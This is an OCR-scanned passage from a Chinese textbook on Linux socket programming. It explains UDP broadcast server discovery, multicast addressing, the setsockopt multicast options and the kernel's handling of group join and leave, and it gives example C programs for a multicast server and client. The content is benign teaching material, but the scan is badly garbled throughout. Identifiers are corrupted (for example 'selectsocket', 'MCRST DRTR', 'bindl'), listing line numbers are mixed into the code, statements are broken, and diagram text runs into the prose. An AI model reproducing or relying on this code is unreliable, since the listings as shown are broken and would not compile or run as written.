断 响应 字符 串 是 否 包含 P_FOUND_ACK 来 确定 局 域 网 上 是 否 存 在 服务 器 ， 如 果 有 服务 器 
的 响应 ， 则 根据 recvfrom() 函 数 的 from 变量 可 以 获得 服务 器 的 IP 地 址 。 

2. 广播 的 服务 器 端 代码 


服务 器 的 代码 如 下 ， 服 务 器 等 待 客户 端 向 某 个 端口 发 送 数据 ， 如 果 数 据 的 格式 正确 ， 
则 服务 器 会 向 客户 端 发 送 响应 数据 。 


01 #define IP FOUND "IP FOUND" /*IP 发 现 命令 */ 

02 #define IP FOUND ACK "IP FOUND ACK" /*IP 发 现 应 答 命令 */ 
03 void HandleIPFound (voidxarg) 

04 { 

05 #define BUFFER LEN 32 

06 int ret = -1; 

07 SOCKET sock = -1; 


08 
09 
10 
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客户 端 服务 器 端 


构建 IP 发 现 请 求 包 
IP_ FOUND 


发 送 广播 请 求全 一 一 一 一 一 ”| 


等 待 响应 等 待 数 据 LA 


一 一 一 > 接收 数据 


接收 数据 FR 一 一 一 一 一 


. 构建 TP 发 现 请 求 包 
IP FOUND ACK 
发 现 主机 IP 地 址 站 


发 送 响应 数据 


图 11.5 利用 广播 进行 服务 器 IP 地 址 的 发 现 


struct sockaddr in local addr; /* 本 地 地 址 */ 
struct sockaddr in from addr; /* 客 户 端 地 址 */ 
int from len; 


ss 


65 
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int count = -1; 

fd set readfd; 

char buff[BUFFER LEN]; 

struct timeval timeout; 

timeout.tv sec = 2; /* 超 时 时 间 2s*/ 
timeout.tv usec = 0; 


DBGPRINT ("==>HandleIPFound\n"); 


sock = socket (AF_INET，SOCK _DGRAM，0); /* 建 立 数据 报 套 接 字 */ 
Ook < Oy 
{ 

DBGPRINT ("HandleIPFound: socket init error\n"); 


return; 
} 
/* 数 据 清 零 */ 
memset ( (void*) glocal addr, 0, sizeof(struct sockaddr in)); 

/* 清 空 内 存 内 容 */ 

local addr.sin family = AF_INET; /* 协 议 族 */ 
local addr.sin addr.s_addr = htonl (INADDR_ANY) ;/* 本 地 地 址 */ 
local addr.sin port = htons (MCAST PORT); /* 债 听 端 口 */ 
/* 绑 定 */ 


ret = bind(sock, (struct sockaddr*)¢&local addr, sizeof (local addr)); 
if(ret != 0) 
{ 

DBGPRINT ("HandleIPFound:bind errorNn") 

return; 


} 


/* 主 处 理 过 程 */ 
while(1) 
{ 
/* 文 件 描述 符 集合 清 零 */ 
FD _ ZERO(&readfd); 
/* 将 套 接 字 文 件 描述 符 加 入 读 集 合 */ 
FD _ SET(sock, &readfd); 
/*select 侦 听 是 否 有 数据 到 来 */ 
ret = selectsocket (sock+l1, &readfd, NULL, NULL, é&timeout); 
switch (ret) 
case =1;: 
/* 发 生 错 误 */ 
break; 
case 0: 
/* 超 时 */ 
// 超 时 所 要 执行 的 代码 


break; 
default: 


/* 有 数据 到 来 */ 
if( FD ISSET( sock, &readfd ) ) 


lf 
/* 接 收 数据 */ 


count = recvfrom( sock, buff, BUFFER LEN, 0, ( struct 


sockaddr*) &from addr, &from len ); 


66 
67 


。304 。 


DBGPRINT ( "Recv msg is %s\n", buff ); 
i£f( strstr( buff, IPEOUND 3 ) 


68 
69 
70 
71 
法 
73 
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/* 判 断 是 否 吻合 */ 


{ 
/* 将 应 答 数据 复制 进去 */ 
memcpy (buff, IP FOUND ACK, strlen (IP FOUND ACK)+1); 
/* 发 送 给 客户 端 */ 


count = sendto( sock, buff, strlen (buff), 0, 


(struct sockaddr*) &from addr, from len ); 


74 


} 
} 
} 
PRINT ("<==HandleIPFound\n"); 


return; 


} 


服务 器 端 分 为 如 下 步骤 : 


OOOOOODO 


OOOOOOOOOODO 


3. 


第 15 行 定 义 了 服务 器 等 待 的 超时 时 间 ， 为 2s。 

第 28 行将 地 址 结构 清 零 。 

第 30 行 定义 地 址 协议 族 为 AF_INET。 

第 31 行 设置 IP 地 址 为 任意 本 地 地 址 。 

第 32 行 设置 侦 听 的 端口 。 

第 34 行 将 本 地 的 地 址 绑 定 到 一 个 套 接 字 文件 描述 符 上 。 
第 42 行 开 始 为 主 处 理 过 程 ， 使 用 selectsocket() 函 数 ， 按照 2s 的 超时 时 间 侦 听 是 否 
有 数据 到 来 。 

第 45 行文 件 描述 符 集合 清 零 。 

第 47 行将 套 接 字 文件 描述 符 加 入 读 集合 。 

第 49 行 selectsocket() 侦 听 是 否 有 数据 到 来 。 

第 50 行 查看 selectsocket() 的 返回 值 。 

第 52 行 selectsocket() 发 生 错 误 。 

第 55 行 selectsocket() 超 时 。 

第 60 行 有 可 读 的 数据 到 来 。 

第 65 行 接收 数据 。 

第 67 行 查看 接收 到 的 数据 是 否 匹配 。 

第 71 行 复制 响应 数据 。 

第 73 行 发 送 响应 数据 到 客户 端 。 


广播 的 客户 端 代 码 


广播 的 客户 端 函数 代码 如 下 ， 客 户 端 向 服务 器 端 发 送 命令 耻 _ FOUND， 并 等 待 服务 器 
端的 回复 , 如 果 有 服务 器 回复 , 就 向 服务 器 发 送 耻 FOUND_ACK, 否则 发 送 10 遍 后 退出 。 


#define IP FOUND "IP FOUND" /*IP 发 现 命 令 */ 
#define IP FOUND ACK "IP FOUND ACK" /*IP 发 现 应 答 命令 */ 
#define IFNAME "eth0" 
void IPFound (void*arg) 

#define BUFFER LEN 32 

int ret = -1; 


se 
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08 SOCKET sock = -1; 

09 int so broadcast = 1; 

10 Struct TEreOg. EE 

11 struct sockaddr in broadcast addr; /* 本 地 地 址 */ 

人 struct sockaddr in from addr; /* 服 务 器 端 地 址 */ 

EX int from len; 

14 int count = -1; 

15 fd_ set readfd; 

16 char buff[BUFFER LEN]; 

7 struct timeval timeout; 

18 timeout.tv sec = 2; /* 超 时 时 间 2s*/ 

Ll] timeout.tv usec = 0; 

20 

2 sock = socket (AF_INET，SOCK_DGRAM，0); /* 建 立 数据 报 套 接 字 */ 
22 1£( Sock < 0 ) 

23 { 

24 DBGPRINT ("HandleIPFound: socket init error\n"); 

25 return; 

26 

2 /* 将 需要 使 用 的 网 络 接口 字符 串 名 字 复 制 到 结构 中 * / 

28 strcpy (ifr.ifr name IFNRAME, strlen (IFNAME) ) ? 

29 /* 发 送 命令 , 获取 网 络 接口 的 广播 地 址 */ 

30 if(ioctl (sock,SIOCGIFBRDADDR, &ifr) == -1) 

3 perror ("ioctl error"),exit(1); 

32 /* 将 获得 的 广播 地 址 复制 给 变量 broadcast_addr*/ 

人 B memcpy (&broadcast addr, &ifr.ifr broadaddr, sizeof (struct 
sockaddr in )); 

34 broadcast_addr.sin port = htons (MCAST_PORT) ; /* 设 置 广播 端口 */ 
EL 

36 /* 设 置 套 接 字 文件 描述 符 sock 为 可 以 进行 广播 操作 */ 

37 ret = setsockopt (sock, SOL SOCKET,SO BROADCAST, &so broadcast, 
Sizeof so broadcast); 

38 

39 /* 主 处 理 过 程 */ 

40 int times = 10; 

41 int i = 0; 

42 for (i=0;i<times;i++) 

43 { 

44 /* 广 播发 送 服 务 器 地 址 请 求 */ 

45 ret = sendto(sock,IP FOUND,strlen(IP FOUND),0, (struct 
sockaddr*) gbroadcast addr,sizeof (broadcast addr)); 

46 if(ret == -1){ 

47 continue; 

48 

49 /* 文 件 描述 符 集合 清 零 */ 

50 FD ZERO(&readfd); 

5 /* 将 套 接 字 文 件 描述 符 加 入 读 集 合 */ 

a FD SET(sock, &readfd); 

53 /*select 侦 听 是 否 有 数据 到 来 */ 

54 ret = selectsocket (sock+l1, &readfd, NULL, NULL, é&timeout); 
55 switch (ret) 

56 { 

二 了 case ~1: 

58 /* 发 生 错 误 */ 

59 break; 

60 case 0: 

61 /* 超 时 */ 

62 // 超 时 所 要 执行 的 代码 

63 break; 
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64 default: 

65 /* 有 数据 到 来 */ 

66 if( FD ISSET( sock, &readfd ) ) 

67 { 

68 /* 接 收 数据 */ 

69 count = recvfrom( sock, buff, BUFFER LEN, 0, (struct 
sockaddr*) &from addr, &from len ); 

70 DBGPRINT( "Recv msg is %s\n", buff ); 

yl if(strstr (buff，IP_FOUND_ACK) ) /* 判 断 是 否 吻合 */ 

2 { 

73 Printf("found server, IP is %s\n",inet ntoa 
(from addr.sin addr)); 

74 } 

75 break; /* 成 功 获得 服务 器 地 址 , 退出 */ 

76 } 

二 } 

78 } 

79 return; 

80 } 


客户 端 分 为 如 下 步 又 : 


OOoOoOoOoOooOooOooOooOoOoOooOooOoOoOOOO DO 


第 18 行 定义 了 服务 器 等 待 的 超时 时 间 ， 为 2s。 

第 21 行 建立 数据 报 套 接 字 。 

第 28 行 复制 网 络 接口 名 称 。 

第 30 行 获得 与 网 络 接口 名 称 对 应 的 广播 地 址 。 

第 33 行 和 第 34 行 设置 广播 的 地 址 和 端口 。 

第 37 行 设置 可 广播 地 址 ， 因 为 默认 情况 下 是 不 可 广播 的 。 
第 39 行 开始 为 主 处 理 过 程 ， 发 送 多 次 广播 数据 ， 查 看 网 络 上 是 否 有 服务 器 存在 。 
第 45 行 发 送 服务 器 请 求 到 整个 局 域 网 上 。 

第 50 行文 件 描述 符 集合 清 零 。 

第 52 行将 套 接 字 文件 描述 符 加 入 读 集合 。 

第 54 行 select 侦 听 是 否 有 数据 到 来 。 

第 55 行 查看 select 的 返回 值 。 

第 57 行 select 发 生 错误 。 

第 60 行 select 超时 。 

第 64 行 有 可 读 的 数据 到 来 。 

第 69 行 接收 数据 。 

第 71 行 查 看 接收 到 的 数据 是 否 匹 配 。 


11.3 多 播 


单 播 用 于 两 个 主机 之 间 的 端 对 端 通信 ， 广 播 用 于 一 个 主机 对 整个 局 域 网 上 所 有 主机 上 
的 数据 通信 。 单 播 和 广播 是 两 个 极端 ， 要 么 对 一 个 主机 进行 通信 ， 要 么 对 整个 局 域 网 上 的 
主机 进行 通信 。 在 实际 情况 下 ， 经 常 需 要 对 一 组 特定 的 主机 进行 通信 ， 而 不 是 整个 局 域 网 
上 的 所 有 主机 ， 这 就 是 多 播 的 用 途 。 
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11.3.1 多 播 的 概念 


多 播 ， 也 称 为 “组 播 ”， 将 网 络 中 同一 业务 类 型 主机 进行 了 逻辑 上 的 分 组 ， 进 行 数据 收 
发 的 时 候 其 数据 仅仅 在 同一 分 组 中 进行 ， 其 他 的 主机 没有 加 入 此 分 组 不 能 收发 对 应 的 数据 。 

在 广域网 上 广播 的 时 候 ， 其 中 的 交换 机 和 路 由 器 只 向 需要 获取 数据 的 主机 复制 并 转发 
数据 。 主 机 可 以 向 路 由 器 请 求 加 入 或 退出 某 个 组 ， 网 络 中 的 路 由 器 和 交换 机 有 选择 地 复制 
并 传输 数据 ， 将 数据 仅仅 传输 给 组 内 的 主机 。 多 播 的 这 种 功能 ， 可 以 一 次 将 数据 发 送 到 多 
个 主机 ， 又 能 保证 不 影响 其 他 不 需要 (未 加 入 组 ) 的 主机 的 其 他 通信 。 


口 具有 同 种 业务 的 主机 加 入 同一 数据 流 ， 共 享 同一 通道 ， 节 省 了 带宽 。 

口 服务 器 的 总 带宽 不 受 客户 端 带 宽 的 限制 。 由 于 组 播 协议 由 接收 者 的 需求 来 确定 是 
否 进 行 数据 流 的 转发 ， 所 以 服务 器 端的 带宽 是 常量 ， 与 客户 端的 数量 无 关 。 

口 与 单 播 一 样 ， 多 播 是 允许 在 广域网 即 Internet 上 进行 传输 的 ， 而 广播 仅仅 在 同一 局 
域 网 上 才能 进行 。 

多 播 有 以 下 缺点 : 

口 多 播 与 单 播 相 比 没 有 纠 错 机 制 ， 当 发 生 错 误 的 时 候 难 以 弥补 ， 但 是 可 以 在 应 用 层 
来 实现 此 种 功能 。 

口 多 播 的 网 络 支持 存在 缺陷 ， 需 要 路 由 器 及 网 络 协议 栈 的 支持 。 

多 播 的 应 用 主要 有 网 上 视频 、 网 上 会 议 等 。 


11.3.2 ”广域网 的 多 播 


多 播 的 地 址 是 特定 的 , D 类 地 址 用 于 多 播 。 D 类 IP 地址 就 是 多 播 全 地址, 即 224.0.0.0 
至 239.255.255.255 之 间 的 IP 地 址 ， 并 被 划分 为 局 部 连接 多 播 地 址 、 预 留 多 播 地 址 和 管理 
权限 多 播 地 址 3 类 。 
口 局 部 多 播 地 址 : 在 224.0.0.0 一 224.0.0.255 之 间 ， 这 是 为 路 由 协议 和 其 他 用 途 保留 
的 地 址 ， 路 由 器 并 不 转发 属于 此 范围 的 耳 包 。 
口 预 留 多 播 地 址 : 在 224.0.1.0 一 238.255.255.255 之 间 ， 可 用 于 全 球 范围 (如 Internet) 
或 网 络 协议 。 
口 管理 权限 多 播 地 址 : 在 239.0.0.0 一 239.255.255.255 之 间 ， 可 供 组 织 内 部 使 用 ， 类 
似 于 私有 IP 地 址 ， 不 能 用 于 Internet， 可 限制 多 播 范 围 。 


11.3.3 ”多 播 的 编程 


多 播 的 程序 设计 使 用 setsockopt() 函 数 和 getsockopt() 函 数 来 实现 ， 多 播 的 选项 是 IP 层 
的 ， 其 选项 值 和 含义 参见 11.5 所 示 。 


表 11.5 多 播 相关 的 选项 


getsockopt()/setsockopt0 的 选项 含 义 
IP_MULTICAST TTL 设置 多 播 组 数据 的 TTL 值 
IP_ ADD MEMBERSHIP 在 指定 接口 上 加 入 组 播 组 


“308。 


getsockopt()/setsockopt0 的 选项 含义 
IP_DROP MEMBERSHIP 退出 组 播 组 
IP MULTICAST IF 获取 默认 接口 或 设置 接口 
IP MULTICAST LOOP 禁止 组 播 数 据 回 送 


1. 选项 IP_MULTICASE_TTL 


选项 IP_MULTICAST_TTL 允许 设置 超时 TTL， 范 围 为 0 一 255 之 间 的 任何 值 ， 例 如 : 


unsigned char ttl=255; 
setsockopt (s, IPPROTO_IP,IP MULTICAST TTL, &ttl,sizeof (tt1)); 


2. 选项 IP_MULTICAST _IF 


选项 IP_MULTICAST_IF 用 于 设置 组 播 的 默认 网 络 接口 ， 会 从 给 定 的 网 络 接口 发 送 ， 
另 一 个 网 络 接口 会 忽略 此 数据 。 例 如 : 


struct in addr addr; 
Setsockopt (s, IPPROTO_IP,IP MULTICAST IF, &addr, sizeof (addr)); 


参数 addr 是 希望 多 播 输出 接口 的 IP 地 址 , 使 用 INADDR_ANY 地 址 回 送 到 默认 接口 。 

在 默认 情况 下 ， 当 本 机 发 送 组 播 数据 到 某 个 网 络 接口 时 , 在 人 P 层 , 数据 会 回 送 到 本 地 
的 回环 接口 ， 选 项 也 MULTICAST_ LOOP 用 于 控制 数据 是 否 回 送 到 本 地 的 回环 接口 。 
例如 : 


unsigned char loop; 
setsockopt (s, IPPROTO_IP,IP MULTICAST LOOP, &loop, sizeof (loop)); 


参数 loop 设置 为 0 禁止 回 送 ， 设 置 为 1 允许 回 送 。 
3. 选项 IP_ADD_MEMBERSHIP 和 IP_DROP_MEMBERSHIP 


加 入 或 者 退出 一 个 组 播 组 ， 通 过 选项 IP_ ADD MEMBERSHIP 和 IP DROP 
MEMBERSHIP， 对 一 个 结构 struct ip_mreq 类 型 的 变量 进行 控制 ，struct ip_mreq 原型 如 下 : 
struct ip mreq 
{ 
struct in addr imn multiaddr; /* 加 入 或 者 退出 的 广播 组 IP 地 址 */ 
struct in addr imr interface; /* 加 入 或 者 退出 的 网 络 接口 IP 地 址 */ 
}; 
选项 IP_ADD_MEMBERSHIP 用 于 加 入 某 个 广播 组 ， 之 后 就 可 以 向 这 个 广播 组 发 送 数 
据 或 者 从 广播 组 接收 数据 。 此 选项 的 值 为 mreq 结构 ， 成 员 imn_multiaddr 是 需要 加 入 的 广 
播 组 IP 地 址 ， 成 员 imr_interface 是 本 机 需要 加 入 广播 组 的 网 络 接口 IP 地 址 。 例 如 : 


struct ip mreq mreq; 
setsockopt (s, IPPROTO_IP,IP ADD MEMBERSHIP, &mreq, sizeof (mreq)); 


使 用 IP_ADD_MEMBERSHIP 选项 每 次 只 能 加 入 一 个 网 络 接 口 的 IP 地 址 到 多 播 组 ,但 


ss 
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并 不 是 一 个 多 播 组 仅 允许 一 个 主机 IP 地 址 加 入 ， 可 以 多 次 调用 耻 ADD_ MEMBERSHIP 
选项 来 实现 多 个 IP 地 址 加 入 同一 个 广播 组 ， 或 者 同一 个 IP 地 址 加 入 多 个 广播 组 。 当 
imr_interface 为 INADDR_ANY 时 ， 选 择 的 是 默认 组 播 接口 。 


4. 选项 IP_DROP_MEMBERSHIP 


选项 IP_DROP MEMBERSHIP 用 于 从 一 个 广播 组 中 退出 。 例 如 : 


struct ip mreq mreq; 
Setsockopt (s, IPPROTP_IP,IP DROP MEMBERSHIP,&mreqr sizeof (sreq)); 


其 中 ，mreq 包含 了 在 IP_ADD MEMBERSHIP 中 相 


同 的 值 。 0 
[让 力 0 了 
5. 多 播 程序 设计 的 框架 ea 
要 进行 多 播 的 编程 ， 需 要 遵从 一 定 的 编程 框架 ， 其 EN A 
基本 顺序 如 图 11.6 所 示 。 i 
多 播 程序 框架 主要 包含 套 接 字 初始 化 、 设 置 多 播 超 Ip MULTICAST LOOP 


时 时 间 、 加 入 多 播 组 、 发 送 数据 、 接 收 数据 ， 以 及 从 多 
播 组 中 离开 儿 个 方面 。 其 步骤 如 下 : 


1 
加 入 多 播 组 
IP_ADD_MEMBERSHIP 


(1) 建立 一 个 socket。 l 

(2) 然后 设置 多 播 的 参数 ， 例 如 超时 时 间 TTL、 本 发 送 数 据 
地 回环 许可 LOOP 等 。 sendto() 

td I 

(4) 发 送 和 接收 数据 。 recvfrom() 

(5) 从 多 播 组 离开 。 1 

从 多 播 组 离开 

11.3.4 内核 中 的 多 播 IP_DROP_MEMBERSHIP 

Linux 内 核 中 的 多 播 是 利用 结构 struct ip_me_socklist 图 11.6 多 播 的 编程 流程 


将 多 播 的 各 个 方面 连接 起 来 的 ， 其 示意 图 如 图 11.7 所 示 。 


struct inet sock { 


_u8 mc_tt17 /* 多 播 TTL*/ 
ug 

mc_ loop:1; /* 多 播 回 环 设置 */ 
int mc_ index; /* 多 播 设备 序号 */ 
_ be32 mc_addr; /* 多 播 地 址 */ 


struct ip mc socklist *mc list;  ”/* 多 播 群 数组 */ 


一 


结构 成 员 mc_ttl 用 于 控制 多 播 的 TTL; 
结构 成 员 mc _loop 表示 是 否 回环 有 效 ， 用 于 控制 多 播 数据 的 本 地 发 送 ， 
结构 成 员 mc_index 用 于 表示 网 络 设备 的 序号 ; 


口 口 口 


-3 
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[多 播 的 TTL 
struct sock sk; 
So 5 未 地 回环 
_ug me ttl; 
me loop:l; 多 播 的 网 络 接口 序号 
int mem 
_be32 me _addr; 
struct ip_me_socklist *me list; [全 多 播 地 址 
[多 播 列表 
struct ip me socklist *next; 多 播映 射 结构 
uy pmronn multi; struct in_addr imr_multiaddr; 
unsigned int sfmode; = 
Ss 和 struct in_addr imr_address; 
struct ip_sf socklist *sflist; = ee 
int imr_ifindex; 
[struct ip_me_socklist *next; 
struct ip_mreqn multi; 
unsigned int sl_max; unsigned int sfmode; 
unsigned int sl_count; struct ip_sf socklist *sflist 
_be32 sl_addr[0]; 
= 
struct ip_ me_socklist *next; 
struct ip_mreqn multi; 
unsigned int sfmode; 
struct ip_sf socklist *sflist; 
图 11.7 多 播 的 内 核 结构 
口 结构 成 员 mc_addr 用 于 保存 多 播 的 地 址 ; 
口 结构 成 员 mc_list 用 于 保存 多 播 的 群 组 。 
1. 结构 ip_mc_socklist 
结构 成 员 mc _list 的 原型 为 struct ip_mec_socklist， 定 义 如 下 : 
struct ip mc socklist 
{ 
struct ip mc socklist *next; 
struct ip mreqn multi; 
unsigned int sfmode; /*MCAST_{INCLUDE, EXCLUDE}*/ 
struct ip sf socklist *sflist; 
Ha 
口 成 员 参 数 next 指向 链表 的 下 一 个 节点 。 
口 成 员 参 数 multi 表示 组 信息 ， 即 在 哪 一 个 本 地 接口 上 ， 加 入 到 哪 一 个 多 播 组 。 
口 成 员 参 数 sftmode 是 过 滤 模 式 , 取 值 为 MCAST INCLUDE 或 MCAST EXCLUDE， 


分 别 表示 只 接收 sflist 所 列 出 的 那些 源 的 多 播 数据 报 ， 和 不 接收 sflist 所 列 出 的 那 
些 源 的 多 播 数据 报 。 
口 成 员 参 数 sflist 是 源 列 表 。 


加 和 
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2. 结构 ip_mreqn 
multi 成 员 的 原型 为 结构 struct ip_mreqn， 定 义 如 下 : 


struct ip mreqn 


{ 


struct in addr imr multiaddr; /* 多 播 组 的 IP 地 址 */ 
struct in addr imr address; /* 本 地 址 网 络 接口 的 IP 地 址 */ 
int imr ifindex; /* 网 络 接口 序号 */ 


中 

该 结构 体 的 两 个 成 员 分 别 用 于 指定 所 加 入 的 多 播 组 的 组 IP 地 址 和 所 要 加 入 组 的 那个 
本 地 接口 的 IP 地 址 。 该 命令 字 没 有 源 过 滤 的 功能 , 它 相 当 于 实现 IGMPv1 的 多 播 加 入 服务 
接口 。 

3. 结构 ip_sf_socklist 

成 员 sflist 的 原型 为 结构 struct ip_sf_socklist， 定 义 如 下 : 


struct ip sf socklist 
{ 


unsigned int Sl max; /* 当 前 sl1_addr 数组 的 最 大 可 容纳 量 */ 
unsigned int sl count; /* 源 地 址 列表 中 源 地 址 的 数量 */ 
i sl addr[0]; /* 源 地 址 列表 */ 


}; 

口 成 员 参 数 sl_addr 表示 源 地 址 列表 ; 

口 成 员 参 数 sl_count 表示 源 地 址 列表 中 源 地 址 的 数量 ; 

口 成 员 参 数 sL max 表示 当前 sl_addr 数组 的 最 大 可 容纳 量 。 


4. 选项 IP_ADD_MEMBERSHIP 


选项 了 了 ADD MEMBERSHIP 用 于 把 一 个 本 地 的 IP 地址 加 入 到 一 个 多 播 组 , 在 内 核 中 
其 处 理 过 程 如 图 11.8 所 示 , 在 应 用 层 调 用 函数 setsockopt0) 的 选项 IP_ADD_MEMBERSHIP 
后 ， 内 核 的 处 理 过 程 如 下 ， 主 要 调用 了 函数 ip_mc join_group()。 

(1) 将 用 户 数据 复制 如 内 核 。 

(2) 判断 广播 卫 地 址 是 否 合法 。 

(3) 查找 卫 地 址 对 应 的 网 络 接口 。 

(4) 查找 多 播 列表 中 是 否 已 经 存在 多 播 地 址 。 

(5) 将 此 多 播 地 址 加 入 列表 。 

(6) 返回 处 理 值 。 


5. 选项 IP_DROP_MEMBERSHIP 


选项 IP_DROP_MEMBERSHIP 用 于 把 一 个 本 地 的 人 P 地 址 从 一 个 多 播 组 中 取出 ， 在 内 
核 中 其 处 理 过 程 如 图 11.9 所 示 。 在 应 用 层 调用 setsockopt0 函数 的 选项 IP_DROP_ 
MEMBERSHIP 后 ， 内 核 的 处 理 过 程 如 下 ， 主 要 调用 了 函数 ip_mc_leave_group()。 
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加 入 多 播 组 


sizeof(mreq)); 


setsockopt(s,IPPROTO IP.IP ADD MEMBERSHIP,&mreq, 


应 用 层 


内 核 层 


[将 用 户 数据 复制 到 内 核 


加 入 广播 组 


ip_mce _join_group(sk, &mreq); 


copy_from_user(&mreq,optval,sizeoflstructip_mreq); | 


if (lipv4_is_multicast(addr)) 
return -EINVAL; 


in_dev = ip_me_find_dev(imr); 


[For(T= inet->me T'st TT= TSnext)T 
if' (L- ->multiimr_multiaddr.s addr 一 addr&& 
i->multiimr ifindex == ifindex) 
goto done; 
count++; 


ip_mc_inc_group(in_dev, addr); 


-= 


| 


返回 错误 值 


[判断 给 定 的 多 播 吓 地 址 是 否 合法 


| 根据 多 播 struct ip_mreqn *imr 查 找 网 络 接口 


查找 多 播 列表 中 是 否 有 
| 此 地 址 


[加 入 广播 组 


图 11.8 ”选项 IP_ADD_MEMBERSHIP 的 内 核 处 理 过 程 


(1) 将 用 户 数据 复制 入 内 核 。 

(2) 查找 人 P 地 址 对 应 的 网 络 接口 。 
(3) 查找 多 播 列表 中 是 否 
(4) 将 此 多 播 地 址 从 源 地 址 中 取出 。 
(5) 将 此 地 址 结构 从 多 播 列 表 中 取出 。 
(6) 返回 处 理 值 。 


11.3.5 ”一 个 多 播 例 子 的 服务 器 端 


已 经 存在 多 播 地 址 。 


下 面 是 一 个 多 播 服务 器 的 例子 。 多 播 服务 器 的 程序 设计 很 简单 ， 建 立 一 个 数据 包 套 接 


字 ， 选 定 多 播 的 IP 地 址 和 端口 ， 直 接 向 此 多 播 地 址 发 送 数据 就 可 以 了 。 多 播 服务 器 的 程序 
设计 ， 不 需要 服务 器 加 入 多 播 组 ， 可 以 直接 向 某 个 多 播 组 发 送 数据 。 


名 二 全 
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Linux 上 


setsockopt(s,IPPROTO _IP,IP_DROP_ MEMBERSHIP,é&mreq,sizeof(mreq)); 


应 用 层 


内 核 导 有 
copy_from_user(&mreq,optval,sizeofstruct ip_mreq); 
ip_me_leave_group(sk, &mreq); 


[加 入 广播 组 


in_dev = ip_me _find_dev(imr); 


TF (ml->multiimr multiaddr.s addr ‘= group) 
continue; 
If (ifindex) { 
If (iml->multi.imr_ifindex != ifindex) 
continue; 
} else if (imr->imr_address.s addr && 
Imr->imr_address.s_addr !=iml->multi.imr_address.s_addr) 
continue; i 


(void) ip_ me_leave_src(sk, iml, in_dev); 


ip_ me_dec_ group(in_dev, group); 


! 


返回 值 


[将 用 户 数 据 复制 到 内 核 


下 根据 多 播 struct ip_mreqn *imr 查 找 网 络 接口 


[到 消 多 播 组 的 源 


取消 多 播 组 


图 11.9 选项 IP_DROP_MEMBERSHIP 的 内 核 处 理 过 程 


下 面 的 例子 持续 向 多 播 IP 地 址 "224.0.0.88" 的 8888 端口 发 送 数 据 "BROADCAST TEST 


DATA'"， 每 发 送 一 次 间隔 5s。 


Li 

02 *broadcast_server.c - 多 播 服务 程序 
03 Ts 

04 #define MCAST PORT 8888; 

05 #define MCAST ADDR "224.0.0.88" 
06 #define MCAST DATA "BROADCAST TEST DATA" 
07 #define MCAST INTERVAL 5 

08 int main(int argc, char*argv[]) 

O09 74 

10 int s; 

11 struct sockaddr in mcast addr; 


/* 一 个 局 部 连接 多 播 地 址 , 路 由 器 不 进行 转发 */ 


/* 多 播发 送 的 数据 */ 
/* 发 送 间隔 时 间 */ 


正之 
下 
14 
15 
16 
‘yh 
18 
19 
20 
2 


六 


23 
24 
25 
26 
之 有 
28 
29 
30 
31 
32 
S35 
34 
El 
36 
3 
38 
39 
40 
41 
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s = socket (AF INET, SOCK DGRAM, 0); /* 建 立 套 接 字 */ 
if (s == -1) 
{ 

perror ("socket () "); 

return -1; 


} 


memset (&gmcast addr, 0，sizeof (mcast _ addr));/* 初 始 化 IP 多 播 地 址 为 0*/ 


mcast addr.sin family = REF INET; /* 设 置 协 议 族 类 行为 AF*/ 
mcast addr.sin addr.s addr = inet addr (MCAST ADDR); 
/* 设 置 多 播 IP 地 址 */ 
mcast addr.sin port = htons (MCAST_ PORT);  ”/* 设 置 多 播 端口 */ 
/* 向 多 播 地 址 发 送 数 据 */ 
while(1) { 
int n = sendto(s, /* 套 接 字 描述 符 */ 
MCRST DRTR， /* 数 据 */ 
sizeof (MCAST DATA), /* 长 度 */ 
0， 
(struct sockaddr*) gmcast addr, 
sizeof (mcast addr)); 
En < 


{ 
perror ("sendto()"); 
return -2; 


} 


sleep (MCAST INTERVAL); /* 等 待 一 段 时 间 */ 
} 


return 0; 


一 个 多 播 例 子 的 客户 端 


多 播 组 的 IP 地 址 为 224.0.0.88， 端 口 为 8888， 当 客户 端 接收 到 多 播 的 数据 后 将 打印 


出 来 。 


客户 端 只 有 在 加 入 多 播 组 后 才能 接收 多 播 组 的 数据 ， 因 此 多 播客 户 端 在 接收 多 播 组 的 
数据 之 前 需要 先 加 入 多 播 组 ， 当 接收 完毕 后 要 退出 多 播 组 。 


01 


02 
03 


/* 

*broadcast_client.c - 多 播 的 客户 端 
人 

#define MCAST PORT 8888; 


#define MCAST RDDR "224.0.0.88" ”/* 一 个 局 部 连接 多 播 地 址 , 路 由 器 不 进行 转发 */ 
#define MCAST INTERVAL 5 /* 发 送 间隔 时 间 */ 
#define BUFF SIZE 256 /* 接 收 缓冲 区 大 小 */ 
int main (int argc, char*argv[]) 
{ 
int s; /* 套 接 字 文件 描述 符 */ 
struct sockaddr in local addr; /* 本 地 地 址 */ 
int err = -1; 
s = socket (AF INET, SOCK DGRAM, 0); /* 建 立 套 接 字 */ 
3 = 


we 
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perror ("socket () ") 
return -1; 


/* 初 始 化 地 址 */ 
memset (&local addr, 0, sizeof (local addr)); 
local addr.sin family = AF INET; 
local addr.sin addr.s addr = htonl (INADDR ANY); 
local addr.sin port = htons (MCAST PORT); 


/# 绑 定 socket*/ 
err = bindl(s, (struct sockaddr*) &local addr, sizeof(local addr)) ; 
if(err < 0) 
{ 
perror ("bind()"); 
return -2; 


/* 设 置 回环 许可 */ 
int loop = 1; 
err = setsockopt (s, IPPROTO IP, IP MULTICAST LOOP, &loop, sizeof (loop)); 
if(err < 0) 
{ 
perror ("setsockopt () :IP_ MULTICAST LOOP"); 
return -3; 


struct ip mreq mreq; /* 加 入 广播 组 */ 
mreq.imr multiaddr.s addr = inet addr (MCAST ADDR); /* 广 播 地 址 */ 
mreq.imr interface.s addr = htonl (INADDR ANY); /* 网 络 接口 为 默认 / 
/* 将 本 机 加 入 广播 组 */ 

err = setsockopt (s, IPPROTO IP, IP ADD MEMBERSHIP, &mreq, sizeof (mreq) ) 
4 (err < 0) 


| 


ll 


perror ("setsockopt () :IP_ADD MEMBERSHIP"); 
return -4; 


} 


int times = 0; 

int addr len = 0; 

Char buff[BUFF SIZE]; 

int n = 0; 

/* 循 环 接收 广播 组 的 消息 , 5 次 后 退出 */ 

for (times = 0;times<5;times++) 

{ 
addr len = sizeof(local addr); 
memset (buff, 0, BUFF SIZE); /* 清 空 接收 缓冲 区 */ 
/* 接 收 数据 */ 


n = recvfrom(s, buff, BUFF SIZE, 0, (struct sockaddr*)&local 


addr, &addr len); 
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if( n== -1) 
t 
perror ("recvfrom()"); 
’ 
/* 打 印信 息 */ 
printf ("Recv %dst message from server:%s\n", times, buff); 
sleep (MCAST INTERVAL); 
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1 

74 

75 /* 退 出 广播 组 */ 

